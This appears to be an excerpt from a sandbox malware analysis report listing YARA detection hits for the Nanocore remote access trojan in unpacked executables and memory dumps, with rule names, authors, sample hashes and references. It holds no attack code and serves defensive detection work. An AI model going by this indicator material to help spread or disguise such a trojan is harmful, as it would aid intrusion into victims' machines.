      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
